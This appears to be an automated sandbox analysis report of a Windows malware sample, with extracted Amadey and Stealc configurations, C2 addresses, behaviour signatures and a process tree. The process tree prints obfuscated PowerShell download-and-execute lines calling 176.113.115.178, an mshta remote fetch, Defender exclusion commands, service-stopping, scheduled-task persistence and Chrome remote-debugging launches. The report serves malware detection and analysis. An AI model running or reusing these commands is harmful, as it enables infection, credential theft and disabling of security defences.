Analysis

  • max time kernel
    136s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 19:50

General

  • Target

    436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe

  • Size

    1.8MB

  • MD5

    da4b77594a6a31a9b1fcbabb65346fa5

  • SHA1

    ba835cb96f1e3d8267a973d147a1ccbf80fbd3c4

  • SHA256

    436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0

  • SHA512

    c9b18ab6193c0e3d84ca93ea23338447e665785f4e6c9fc6b65cc6c9aa924118fcb0d3a26a61e43432ef25c5dc412912f7cd23068cdc22528c565f75061cb687

  • SSDEEP

    49152:j++S/0Cfy6rIyGFA0F8yU/qfb7u5CpRvSM/TG5:y+89yxyGrdVfcCpRlK5

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 16 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 29 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Loads dropped DLL
      PID:480
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:596
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:844
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe
              3⤵
              • Drops file in System32 directory
              PID:112
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              3⤵
              • Checks processor information in registry
              PID:1804
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k RPCSS
            2⤵
              PID:672
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
              2⤵
              • Modifies security service
              • Indicator Removal: Clear Windows Event Logs
              PID:736
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
              2⤵
                PID:804
                • C:\Windows\system32\Dwm.exe
                  "C:\Windows\system32\Dwm.exe"
                  3⤵
                    PID:1156
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs
                  2⤵
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:832
                  • C:\Windows\system32\wbem\WMIADAP.EXE
                    wmiadap.exe /F /T /R
                    3⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:1424
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {6CAD4352-557C-4013-BFAA-42672E47CAA7} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                    3⤵
                      PID:3348
                      • C:\Users\Admin\AppData\Local\Temp\service123.exe
                        C:\Users\Admin\AppData\Local\Temp\/service123.exe
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:3604
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:960
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:236
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:300
                        • C:\Windows\system32\taskhost.exe
                          "taskhost.exe"
                          2⤵
                            PID:1084
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                            2⤵
                              PID:1092
                            • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                              "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                              2⤵
                                PID:1572
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                2⤵
                                  PID:2144
                                • C:\Windows\system32\sppsvc.exe
                                  C:\Windows\system32\sppsvc.exe
                                  2⤵
                                    PID:2188
                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                    2⤵
                                      PID:3724
                                    • C:\ProgramData\Mig\Mig.exe
                                      C:\ProgramData\Mig\Mig.exe
                                      2⤵
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      • Suspicious use of SetThreadContext
                                      PID:5020
                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4284
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        3⤵
                                          PID:4168
                                          • C:\Windows\system32\wusa.exe
                                            wusa /uninstall /kb:890830 /quiet /norestart
                                            4⤵
                                            • Drops file in Windows directory
                                            PID:3676
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop UsoSvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:1896
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:3628
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop wuauserv
                                          3⤵
                                          • Launches sc.exe
                                          PID:4540
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop bits
                                          3⤵
                                          • Launches sc.exe
                                          PID:3612
                                        • C:\Windows\system32\sc.exe
                                          C:\Windows\system32\sc.exe stop dosvc
                                          3⤵
                                          • Launches sc.exe
                                          PID:3992
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4116
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4128
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4136
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4464
                                        • C:\Windows\system32\dialer.exe
                                          C:\Windows\system32\dialer.exe
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4664
                                        • C:\Windows\system32\dialer.exe
                                          C:\Windows\system32\dialer.exe
                                          3⤵
                                            PID:4544
                                          • C:\Windows\system32\dialer.exe
                                            dialer.exe
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4240
                                      • C:\Windows\system32\lsass.exe
                                        C:\Windows\system32\lsass.exe
                                        1⤵
                                          PID:488
                                        • C:\Windows\system32\lsm.exe
                                          C:\Windows\system32\lsm.exe
                                          1⤵
                                            PID:496
                                          • C:\Windows\Explorer.EXE
                                            C:\Windows\Explorer.EXE
                                            1⤵
                                              PID:1192
                                              • C:\Users\Admin\AppData\Local\Temp\436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe
                                                "C:\Users\Admin\AppData\Local\Temp\436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0.exe"
                                                2⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Identifies Wine through registry keys
                                                • Loads dropped DLL
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of WriteProcessMemory
                                                PID:2528
                                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Loads dropped DLL
                                                  • Adds Run key to start application
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2752
                                                  • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"
                                                    4⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Modifies system certificate store
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1212
                                                  • C:\Users\Admin\AppData\Local\Temp\1007999001\a75a31f719.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1007999001\a75a31f719.exe"
                                                    4⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Loads dropped DLL
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Checks processor information in registry
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2936
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                      5⤵
                                                      • Uses browser remote debugging
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:4040
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6e09758,0x7fef6e09768,0x7fef6e09778
                                                        6⤵
                                                          PID:4052
                                                        • C:\Windows\system32\ctfmon.exe
                                                          ctfmon.exe
                                                          6⤵
                                                            PID:3176
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1084 --field-trial-handle=1288,i,1169646002108496933,8050340279546648870,131072 /prefetch:2
                                                            6⤵
                                                              PID:3352
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1288,i,1169646002108496933,8050340279546648870,131072 /prefetch:8
                                                              6⤵
                                                                PID:3368
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1288,i,1169646002108496933,8050340279546648870,131072 /prefetch:8
                                                                6⤵
                                                                  PID:3444
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2264 --field-trial-handle=1288,i,1169646002108496933,8050340279546648870,131072 /prefetch:1
                                                                  6⤵
                                                                  • Uses browser remote debugging
                                                                  PID:3520
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2272 --field-trial-handle=1288,i,1169646002108496933,8050340279546648870,131072 /prefetch:1
                                                                  6⤵
                                                                  • Uses browser remote debugging
                                                                  PID:3704
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=972 --field-trial-handle=1288,i,1169646002108496933,8050340279546648870,131072 /prefetch:2
                                                                  6⤵
                                                                    PID:3660
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2148 --field-trial-handle=1288,i,1169646002108496933,8050340279546648870,131072 /prefetch:1
                                                                    6⤵
                                                                    • Uses browser remote debugging
                                                                    PID:3780
                                                                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:3624
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                                                                  5⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:4520
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 940
                                                                  5⤵
                                                                  • Loads dropped DLL
                                                                  • Program crash
                                                                  PID:4556
                                                              • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1444
                                                                • C:\Windows\system32\wscript.exe
                                                                  "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                                  5⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1716
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                    6⤵
                                                                    • Blocklisted process makes network request
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1916
                                                                    • C:\Windows\System32\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                                      7⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:872
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                                        8⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1484
                                                                        • C:\Windows\system32\mshta.exe
                                                                          mshta http://176.113.115.178/Windows-Update
                                                                          9⤵
                                                                          • Blocklisted process makes network request
                                                                          • Modifies Internet Explorer settings
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1988
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                            10⤵
                                                                            • UAC bypass
                                                                            • Blocklisted process makes network request
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Loads dropped DLL
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2564
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                                              11⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1944
                                                                            • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                                              "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                                              11⤵
                                                                              • Checks BIOS information in registry
                                                                              • Executes dropped EXE
                                                                              • Drops file in System32 directory
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:3808
                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                12⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Drops file in System32 directory
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3944
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                12⤵
                                                                                  PID:1896
                                                                                  • C:\Windows\system32\wusa.exe
                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                    13⤵
                                                                                    • Drops file in Windows directory
                                                                                    PID:3356
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                                                  12⤵
                                                                                  • Launches sc.exe
                                                                                  PID:1184
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                  12⤵
                                                                                  • Launches sc.exe
                                                                                  PID:4016
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                                                  12⤵
                                                                                  • Launches sc.exe
                                                                                  PID:3372
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe stop bits
                                                                                  12⤵
                                                                                  • Launches sc.exe
                                                                                  PID:3556
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                                  12⤵
                                                                                  • Launches sc.exe
                                                                                  PID:3580
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                  12⤵
                                                                                  • Power Settings
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3612
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                  12⤵
                                                                                  • Power Settings
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3620
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                  12⤵
                                                                                  • Power Settings
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3628
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                  12⤵
                                                                                  • Power Settings
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3636
                                                                                • C:\Windows\system32\dialer.exe
                                                                                  C:\Windows\system32\dialer.exe
                                                                                  12⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3484
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe delete "LIB"
                                                                                  12⤵
                                                                                  • Launches sc.exe
                                                                                  PID:3292
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                                  12⤵
                                                                                  • Launches sc.exe
                                                                                  PID:3504
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe stop eventlog
                                                                                  12⤵
                                                                                  • Launches sc.exe
                                                                                  PID:4684
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe start "LIB"
                                                                                  12⤵
                                                                                  • Launches sc.exe
                                                                                  PID:4692
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                      6⤵
                                                                      • Blocklisted process makes network request
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:1952
                                                                      • C:\Windows\system32\ipconfig.exe
                                                                        "C:\Windows\system32\ipconfig.exe" /flushdns
                                                                        7⤵
                                                                        • Gathers network information
                                                                        PID:1548
                                                                • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1452
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-FIGO0.tmp\FunnyJellyfish.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-FIGO0.tmp\FunnyJellyfish.tmp" /SL5="$B01B0,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1228
                                                                    • C:\Windows\SysWOW64\cmd.exe
